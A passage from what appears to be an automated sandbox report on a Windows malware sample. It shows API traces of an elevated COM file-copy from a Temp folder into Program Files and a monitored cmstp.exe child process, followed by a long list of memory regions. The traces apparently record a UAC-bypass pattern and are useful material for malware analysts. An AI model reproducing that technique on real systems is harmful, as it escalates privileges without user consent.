Buffer=0x8ebf840*, Length=0x98800, ByteOffset=0x26ef468*=0, Key=0x0 | out: IoStatusBlock=0x26ef470, Buffer=0x8ebf840*) returned 0x0 [0257.029] NtClose (Handle=0xa94) returned 0x0 [0257.039] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0 [0257.039] CoCreateInstance (in: rclsid=0x25803de*(Data1=0x3ad05575, Data2=0x8857, Data3=0x4850, Data4=([0]=0x92, [1]=0x77, [2]=0x11, [3]=0xb8, [4]=0x5b, [5]=0xdb, [6]=0x8e, [7]=0x9)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x25803ee*(Data1=0x947aab5f, Data2=0xa5c, Data3=0x4c13, Data4=([0]=0xb4, [1]=0xd6, [2]=0x4b, [3]=0xf7, [4]=0x83, [5]=0x6f, [6]=0xc9, [7]=0xf8)), ppv=0x26ef9c0 | out: ppv=0x26ef9c0*=0x3dbd6c0) returned 0x0 [0257.051] FileOperation:IFileOperation:SetOperationFlags (This=0x3dbd6c0, dwOperationFlags=0x10840414) returned 0x0 [0257.051] SHCreateItemFromParsingName (in: pszPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Gjptlgbx0", pbc=0x0, riid=0x25803ce*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x26ef9d8 | out: ppv=0x26ef9d8*=0x71a3bf8) returned 0x0 [0257.110] SHCreateItemFromParsingName (in: pszPath="C:\\Program Files (x86)", pbc=0x0, riid=0x25803ce*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x26ef9d0 | out: ppv=0x26ef9d0*=0x71a36b8) returned 0x0 [0257.112] FileOperation:IFileOperation:CopyItem (This=0x3dbd6c0, psiItem=0x71a3bf8, psiDestinationFolder=0x71a36b8, pszCopyName="Gjptlgbx0", pfopsItem=0x0) returned 0x0 [0257.115] FileOperation:IFileOperation:PerformOperations (This=0x3dbd6c0) Thread: id = 194 os_tid = 0xf84 Thread: id = 195 os_tid = 0xf8c Thread: id = 196 os_tid = 0xf90 Thread: id = 197 os_tid = 0xf94 Thread: id = 206 os_tid = 0xfdc Process: id = "8" image_name = "cmstp.exe" filename = "c:\\windows\\syswow64\\cmstp.exe" page_root = "0xd369000" os_pid = "0xed8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x45c" cmd_line = "\"C:\\Windows\\SysWOW64\\cmstp.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1956 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1957 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1958 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1959 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1960 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1961 start_va = 0x160000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1962 start_va = 0x220000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1963 start_va = 0xc60000 end_va = 0xc77fff monitored = 1 entry_point = 0xc6e401 region_type = mapped_file name = "cmstp.exe" filename = "\\Windows\\SysWOW64\\cmstp.exe" (normalized: "c:\\windows\\syswow64\\cmstp.exe") Region: id = 1964 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1965 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1966 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1967 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1968 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1969 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1970 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1971 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1972 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1987 start_va = 0x70000 end_va = 0x9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1989 start_va = 0xc60000 end_va = 0xc77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1995 start_va = 0x2f0000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1996 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1997 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1998 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1999 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2000 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2001 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2002 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2003 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2004 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2005 start_va = 0x370000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2006 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2007 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2008 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2009 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2010 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2012 start_va = 0xa0000 end_va = 0x106fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2013 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2014 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2015 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2016 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2017 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2018 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2019 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2020 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2021 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2022 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2033 start_va = 0x751e0000 end_va = 0x751edfff monitored = 0 entry_point = 0x751e7ec5 region_type = mapped_file name = "cmutil.dll" filename = "\\Windows\\SysWOW64\\cmutil.dll" (normalized: "c:\\windows\\syswow64\\cmutil.dll") Region: id = 2037 start_va = 0x74400000 end_va = 0x74408fff monitored = 0 entry_point = 0x74401220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2038 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2039 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2040 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2041 start_va = 0x500000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2042 start_va = 0x500000 end_va = 0x687fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2043 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2044 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2045 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2046 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2047 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2049 start_va = 0x6a0000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2050 start_va = 0xc80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 2051 start_va = 0x20000 end_va = 0x24fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmstp.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmstp.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmstp.exe.mui") Region: id = 2054 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2055 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2057 start_va = 0x830000 end_va = 0x96bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 2060 start_va = 0x970000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 2061 start_va = 0x2080000 end_va = 0x2382fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 2062 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2063 start_va = 0x120000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2064 start_va = 0x380000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2065 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2066 start_va = 0x830000 end_va = 0x8c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 2067 start_va = 0x8f0000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 2068 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2134 start_va = 0x120000 end_va = 0x14efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2135 start_va = 0x1a0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2136 start_va = 0x930000 end_va = 0x9c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2137 start_va = 0x9d0000 end_va = 0xa62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 2138 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2139 start_va = 0x1d0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2140 start_va = 0x2390000 end_va = 0x2d53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002390000" filename = "" Region: id = 2141 start_va = 0x2d60000 end_va = 0x2f54fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 2142 start_va = 0x2f60000 end_va = 0x3154fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 2144 start_va = 0x1f0000 end_va = 0x218fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2145 start_va = 0xa70000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 2146 start_va = 0xb10000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 2147 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2148 start_va = 0x765c0000 end_va = 0x766b4fff monitored = 0 entry_point = 0x765c1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2149 start_va = 0x75470000 end_va = 0x755a5fff monitored = 0 entry_point = 0x75471b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2150 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2151 start_va = 0x768b0000 end_va = 0x769d0fff monitored = 0 entry_point = 0x768b158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2152 start_va = 0x766c0000 end_va = 0x766cbfff monitored = 0 entry_point = 0x766c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2153 start_va = 0x76e50000 end_va = 0x7704afff monitored = 0 entry_point = 0x76e522d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2163 start_va = 0xb50000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 2477 start_va = 0xb50000 end_va = 0xc33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 2670 start_va = 0xb50000 end_va = 0xc34fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 2725 start_va = 0x3160000 end_va = 0x3275fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 2778 start_va = 0x3160000 end_va = 0x3306fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 2831 start_va = 0x3160000 end_va = 0x3299fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 2884 start_va = 0x3160000 end_va = 0x32b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 2937 start_va = 0xb50000 end_va = 0xc37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 2990 start_va = 0x3160000 end_va = 0x32d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 3043 start_va = 0x3160000 end_va = 0x32f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 3096 start_va = 0x3160000 end_va = 0x330bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 3098 start_va = 0x3160000 end_va = 0x327ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 3151 start_va = 0x270000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 3152 start_va = 0xb70000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 3153 start_va = 0xbd0000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 3154 start_va = 0x3260000 end_va = 0x329ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 3155 start_va = 0x32a0000 end_va = 0x342ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3156 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 3157 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3210 start_va = 0x32a0000 end_va = 0x33b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3263 start_va = 0x3160000 end_va = 0x325afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 3316 start_va = 0x32a0000 end_va = 0x340afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3369 start_va = 0x32a0000 end_va = 0x3404fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3422 start_va = 0x32a0000 end_va = 0x3401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3526 start_va = 0x32a0000 end_va = 0x33a5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3579 start_va = 0x32a0000 end_va = 0x33affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3632 start_va = 0x32a0000 end_va = 0x343ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3685 start_va = 0x32a0000 end_va = 0x33e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3738 start_va = 0x32a0000 end_va = 0x3404fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3791 start_va = 0x32a0000 end_va = 0x3421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3844 start_va = 0x32a0000 end_va = 0x33b8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 3897 start_va = 0x3160000 end_va = 0x3215fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003160000" filename = "" Region: id = 3950 start_va = 0x32a0000 end_va = 0x33e5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 4003 start_va = 0x32a0000 end_va = 0x33effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 4056 start_va = 0x32a0000 end_va = 0x3409fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 4109 start_va = 0x32a0000 end_va = 0x33adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 4111 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4112 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4113 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4114 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4115 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4116 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4117 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4118 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4127 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4129 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4130 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4131 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4132 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4133 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4134 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4135 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4136 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4137 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4138 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4139 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4140 start_va = 0x150000 end_va = 